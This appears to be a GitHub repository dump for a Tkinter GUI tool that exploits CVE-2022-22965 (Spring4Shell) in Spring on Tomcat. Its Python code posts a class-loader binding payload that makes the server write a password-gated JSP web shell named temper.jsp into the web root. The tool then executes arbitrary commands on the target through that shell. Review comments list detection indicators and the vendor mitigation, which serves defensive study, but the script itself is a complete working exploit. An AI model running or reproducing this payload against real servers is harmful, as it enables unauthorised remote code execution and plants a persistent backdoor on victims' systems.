├── img
├── QQ20220331-100333@2x.png
└── QQ20220331-114052@2x.png
├── README.md
└── spring-core-rce.py
/img/QQ20220331-100333@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bouquets-ai/CVE-2022-22965-GUItools/HEAD/img/QQ20220331-100333@2x.png
--------------------------------------------------------------------------------
/img/QQ20220331-114052@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Bouquets-ai/CVE-2022-22965-GUItools/HEAD/img/QQ20220331-114052@2x.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-2022-22965及官方修复方案已出。我是修复方案出来了才放的工具哈,各位别乱搞


![](https://hellohy.top/wp-content/uploads/2022/03/QQ20220331-100333@2x-1024x777.png)
![](https://hellohy.top/wp-content/uploads/2022/03/QQ20220331-114052@2x-1024x522.png)
![](https://hellohy.top/imgs/logo.png)

# 工具不会再做任何更改,等过几天把源码上传后就改为归档,想要批量你们自己搞,这个洞没必要。

--------------------------------------------------------------------------------
/spring-core-rce.py:
--------------------------------------------------------------------------------
# !/usr/bin/python
# -*- coding:utf-8 -*-
# name: huayang
# time: 2022.3.31
#
# NOTE(review): Tkinter front-end around a CVE-2022-22965 ("Spring4Shell")
# request; the README states it was published after the official fix.
# The review comments below describe what the code sends and what it leaves
# behind, so the file can be read as a detection/response reference:
#   - network: one POST whose form body assigns
#     `class.module.classLoader.resources.context.parent.pipeline.first.*`
#     properties and carries custom headers `suffix`, `c1`, `c2` (Exploit()),
#     followed by a GET to `<target>/temper.jsp?pwd=j&cmd=...` (utilize());
#   - host: a new file `temper.jsp` in `webapps/ROOT` on the target.
# Mitigation is the vendor fix the README refers to (upgrade Spring Framework);
# the vendor's published interim hardening is a WebDataBinder
# `setDisallowedFields("class.*", "Class.*", "*.class.*", "*.Class.*")` so
# request parameters can no longer bind to `class.module.classLoader`.

import requests
import tkinter
import time          # imported but never used in this file
from tkinter import *
from tkinter import ttk
from tkinter import scrolledtext

# --- window setup ----------------------------------------------------------
window = Tk()

# Default ttk font: 仿宋 (FangSong), 15pt.
ttk.Style().configure(".", font=("仿宋", 15))

window.title('spring-core-rce@huayang(数据里有话)')

window.geometry("714x698")

# Fixed-size window; every widget below is placed at absolute coordinates.
window.wm_resizable(False,False)


# A Notebook is packed but no tabs are ever added to it; the widgets below
# are placed directly on `window`.
tabControl = ttk.Notebook(window)

tabControl.pack(expand=1, fill="both")

#------------------------------
# Input row 1: target base URL ("地址:" = address).
w = tkinter.Label(text="地址:",font=("楷体", 15))
w.place(x=5, y=20)
scr1 = scrolledtext.ScrolledText(width=70, height=3, font=(1))
scr1.place(x=70, y=10)
# Input row 2: command text ("命令:" = command).
w = tkinter.Label(text="命令:",font=("楷体", 15))
w.place(x=5, y=115)
scr2 = scrolledtext.ScrolledText(width=48, height=3, font=(1))
scr2.place(x=70, y=100)
# Placeholder "利用" (exploit) button with no command; a second Button with
# the same text and geometry, wired to utilize(), is placed over it at the
# end of the file.
button = Button(text="利用", width=9, height=3)
button.place(x=495, y=100)

# Output area ("执行结果:" = execution result).
w = tkinter.Label(text="执行结果:",font=("楷体", 20))
w.place(x=280, y=175)
scr3 = scrolledtext.ScrolledText(width=85, height=29, font=(1))
scr3.place(x=5, y=220)
# Initial status text (Chinese): "because of a logic issue the first use
# needs a few seconds' wait and a second click before a result shows". This
# matches utilize(), which issues the GET right after the POST with no wait.
scr3.insert(END, '第一次利用因逻辑问题要等个几秒点击第二下才有结果哦o(*≧▽≦)ツ')

def empty():
    """Clear the URL, command and output text areas."""
    scr1.delete('0.0', 'end')
    scr2.delete('0.0', 'end')
    scr3.delete('0.0', 'end')

# "一键清空" = clear all.
button = Button(text="一键清空", width=9, height=3, command=empty)
button.place(x=590, y=100)

def utilize():
    """Button handler: send the CVE-2022-22965 POST, then fetch the dropped JSP.

    Reads the target base URL from `scr1` and the command text from `scr2`;
    only surrounding newlines are stripped, nothing is validated or
    URL-encoded. Appends the part of the JSP response that precedes the
    first `//` to `scr3`.
    """

    txt = scr1.get('0.0', 'end')
    strip1 = txt.strip('\n')
    txt = scr2.get('0.0', 'end')
    strip2 = txt.strip('\n')

    def Exploit(url):
        """POST the property-binding payload to `url`.

        The form body assigns access-log valve properties reached through
        `class.module.classLoader.resources.context.parent.pipeline.first`
        (on Tomcat these are AccessLogValve settings): `pattern` (a JSP
        fragment), `suffix=.jsp`, `directory=webapps/ROOT`, `prefix=temper`
        and an empty `fileDateFormat`, so the log file is written as
        `webapps/ROOT/temper.jsp` -- the path utilize() requests afterwards.
        Detection hooks: the literal `class.module.classLoader.` parameter
        name prefix in POST bodies, the custom `suffix`/`c1`/`c2` request
        headers, and a new `.jsp` file appearing in the web root.
        """
        # The pattern references these headers as `%{c2}i`, `%{c1}i` and
        # `%{suffix}i` (URL-encoded in `data` below), so their values end up
        # in the written file without appearing literally in the body -- a
        # rule that inspects only the POST body misses them.
        headers = {"suffix": "%>//",
                   "c1": "Runtime",
                   "c2": "<%",
                   "DNT": "1",
                   "Content-Type": "application/x-www-form-urlencoded",
                   # NOTE(review): looks like a base64-encoded attribution
                   # note in Chinese; it is not referenced by the pattern --
                   # decode to confirm.
                   "say": "5qC45b+D5Luj56CB5Y6f5L2c6ICF5pivaGVsbG9leHAo5Zug5LiN5Y+v5o6n5Zug57Sg5LuW5bey57uPZ2l0aHVi5LiK5raI5aSx5LqGKe+8jOacrOS6uuWPquaYr+eugOaUueS4gOS4i+W5tuWll+Wxguearizku4XmraTor4HmmI7ku5blrZjlnKjov4c="
                   }
        data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=temper&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="

        # TLS certificate verification is disabled and the response is
        # discarded, so a failed write is never reported to the user.
        requests.post(url, headers=headers, data=data, timeout=15, allow_redirects=False, verify=False)
    Exploit(strip1)
    # Second network indicator: GET for the dropped file. `pwd=j` is the gate
    # checked inside the written JSP; `cmd` is concatenated unencoded. Unlike
    # the POST above, this request has no timeout.
    response = requests.get(strip1 + '/temper.jsp?pwd=j&cmd=' + strip2)
    # Shadows the builtin `str` inside this function (left as-is).
    str = response.text
    # The written file ends with the `suffix` header value `%>//`, so the JSP
    # output is followed by `//`; keep only what precedes the first `//`.
    string = str.split('//')[0]

    scr3.insert(END, string)

    scr3.insert(END, '\n')


# Live "利用" (exploit) button, placed over the placeholder created earlier.
button = Button(text="利用", width=9, height=3,command=utilize)
button.place(x=495, y=100)

window.mainloop()
--------------------------------------------------------------------------------